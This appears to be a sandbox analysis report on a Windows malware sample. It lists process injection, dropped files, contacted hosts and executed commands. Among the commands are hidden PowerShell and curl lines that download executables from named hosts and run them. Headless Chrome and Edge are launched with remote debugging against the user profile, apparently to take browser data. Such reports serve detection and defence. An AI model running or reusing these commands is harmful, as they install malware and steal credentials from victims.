Technical Information
Malicious functions
Injects code into
the following system processes:
- <SYSTEM32>\fontdrvhost.exe
Modifies file system
Creates the following files
- %TEMP%\bk504446.exe
- %ALLUSERSPROFILE%\vstos
- %ALLUSERSPROFILE%\bungee.boo
- %TEMP%\cld.db
- %TEMP%\cccwf.tmp
- %TEMP%\etilqs_yyuyegvbb3ftix0
- %TEMP%\etilqs_pskmtqklxm4stuq
- %TEMP%\etilqs_a0ebpd67hucuzcg
- %TEMP%\dll_debug.txt
- %TEMP%\brx
- %TEMP%\crx
- %ALLUSERSPROFILE%\cdat.bin2240
- %TEMP%\tx_1780188458494.exe
Deletes following files that it created itself
- %TEMP%\cld.db
- %TEMP%\crx
- %TEMP%\cccwf.tmp
- %TEMP%\brx
Moves the following files
- from %ALLUSERSPROFILE%\bungee.boo to %WINDIR%\omadmapi.dll
Modifies the following files
- %LOCALAPPDATA%\google\chrome\application\debug.log
Network activity
Connects to
- 'vc###ibrary.uk':443
- 'x1.#.lencr.org':80
- 'dn#.google':443
- '19#.#32.214.172':80
- '18#.#1.234.105':80
- 'st####ommunity.com':443
- 'da##side.cy':80
- 'da##side.cy':443
- 'e8.#.lencr.org':80
- 'google.com':80
- 'localhost':49714
- 'localhost':49718
- 'localhost':49723
- 'localhost':49727
- 'localhost':49734
- 'google.com':443
- 'tr######e.googleapis.com':443
- 'ss#.#static.com':443
- 'localhost':49749
- 'localhost':49753
- 'localhost':49757
- 'localhost':49762
- 'fi###.catbox.moe':443
- 'localhost':49769
- 'ri##smp.net':443
TCP
HTTP GET requests
- http://x1.#.lencr.org/
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?d6##############
- http://st####ommunity.com/profiles/76561198764661885/ajaxaliases/
- http://da##side.cy/Stb/PokerFace/init.php?id###############
- http://e8.#.lencr.org/84.crl
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/CABD2A79A1076A31F21D253635CB039D4329A5E8.crt?26##############
- http://e8.#.lencr.org/67.crl
Other
- 'vc###ibrary.uk':443
- 'dn#.google':443
- 'st####ommunity.com':443
- 'da##side.cy':443
- 'localhost':49714
- 'localhost':49715
- 'localhost':49718
- 'localhost':49719
- 'localhost':49723
- 'localhost':49724
- 'localhost':49727
- 'localhost':49728
- 'localhost':49734
- 'localhost':49735
- 'google.com':443
- 'clients2.google.com':443
- 'tr######e.googleapis.com':443
- 'ss#.#static.com':443
- 'localhost':49749
- 'localhost':49750
- 'localhost':49753
- 'localhost':49754
- 'localhost':49757
- 'localhost':49758
- 'localhost':49762
- 'localhost':49763
- 'fi###.catbox.moe':443
- 'localhost':49769
- 'localhost':49770
- 'ri##smp.net':443
UDP
- DNS ASK vc###ibrary.uk
- DNS ASK x1.#.lencr.org
- DNS ASK dn#.google
- DNS ASK st####ommunity.com
- DNS ASK da##side.cy
- DNS ASK e8.#.lencr.org
- DNS ASK google.com
- DNS ASK clients4.google.com
- DNS ASK tr######e.googleapis.com
- DNS ASK clients3.google.com
- DNS ASK clients2.google.com
- DNS ASK ss#.#static.com
- DNS ASK fi###.catbox.moe
- DNS ASK ri##smp.net
Miscellaneous
Searches for the following windows
- ClassName: 'Chrome_MessageWindow' WindowName: '%LOCALAPPDATA%\Google\Chrome\User Data'
Creates and executes the following
- '%TEMP%\bk504446.exe'
Executes the following
- '<SYSTEM32>\cmd.exe' /c start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK649541.exe; Start-Proc...
- '<SYSTEM32>\cmd.exe' /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK649541.exe; Start-Process -FilePath $env:TEM...
- '<SYSTEM32>\cmd.exe' /c start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:TEMP\BK504446.exe; Start-Proc...
- '<SYSTEM32>\cmd.exe' /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:TEMP\BK504446.exe; Start-Process -FilePath $env:TEM...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK649541.exe; Start-Process -FilePath $env:TEMP\BK649541.exe...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:TEMP\BK504446.exe; Start-Process -FilePath $env:TEMP\BK504446.exe...
- '<SYSTEM32>\fontdrvhost.exe'
- '<SYSTEM32>\cmd.exe' cmd.exe /c "move "%ALLUSERSPROFILE%\bungee.boo" "%WINDIR%\omadmapi.dll""
- '<SYSTEM32>\cmd.exe' /c "move "%ALLUSERSPROFILE%\bungee.boo" "%WINDIR%\omadmapi.dll""
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --headless --disable-gpu --no-sandbox --disable-dev-shm-usage --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\User Data" --remote-debugging-port=0
- '<SYSTEM32>\cmd.exe' dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin2240
- '<SYSTEM32>\cmd.exe' curl -o "%TEMP%\da4232c1-ef33-449a-a464-16707738f9d5.tmp" "https://files.catbox.moe/lvh9j3.bin"
- '<SYSTEM32>\curl.exe' -o "%TEMP%\da4232c1-ef33-449a-a464-16707738f9d5.tmp" "https://files.catbox.moe/lvh9j3.bin"
- '<SYSTEM32>\cmd.exe' dir /a /s /b C:\*imgui_impl_win32.cpp C:\*.suo C:\*.exe C:\*.vcxproj C:\*.csproj > %ALLUSERSPROFILE%\CDat.bin2240
- '<SYSTEM32>\cmd.exe' curl -o "%TEMP%\tx_1780188456729.exe" "https://files.catbox.moe/lvh9j3.bin"
- '<SYSTEM32>\curl.exe' -o "%TEMP%\tx_1780188456729.exe" "https://files.catbox.moe/lvh9j3.bin"
- '<SYSTEM32>\cmd.exe' curl -o "%TEMP%\tx_1780188458494.exe" "https://risesmp.net/britney.exe"
- '<SYSTEM32>\curl.exe' -o "%TEMP%\tx_1780188458494.exe" "https://risesmp.net/britney.exe"
- '<SYSTEM32>\cmd.exe' start %TEMP%\tx_1780188458494.exe
- '%TEMP%\bk504446.exe' ' (with hidden window)
- '%LOCALAPPDATA%\google\chrome\application\chrome.exe' --headless --disable-gpu --no-sandbox --disable-dev-shm-usage --user-data-dir="%LOCALAPPDATA%\Google\Chrome\User Data" --remote-debugging-port=0' (with hidden window)
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --headless --disable-gpu --no-sandbox --disable-dev-shm-usage --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\User Data" --remote-debugging-port=0' (with hidden window)
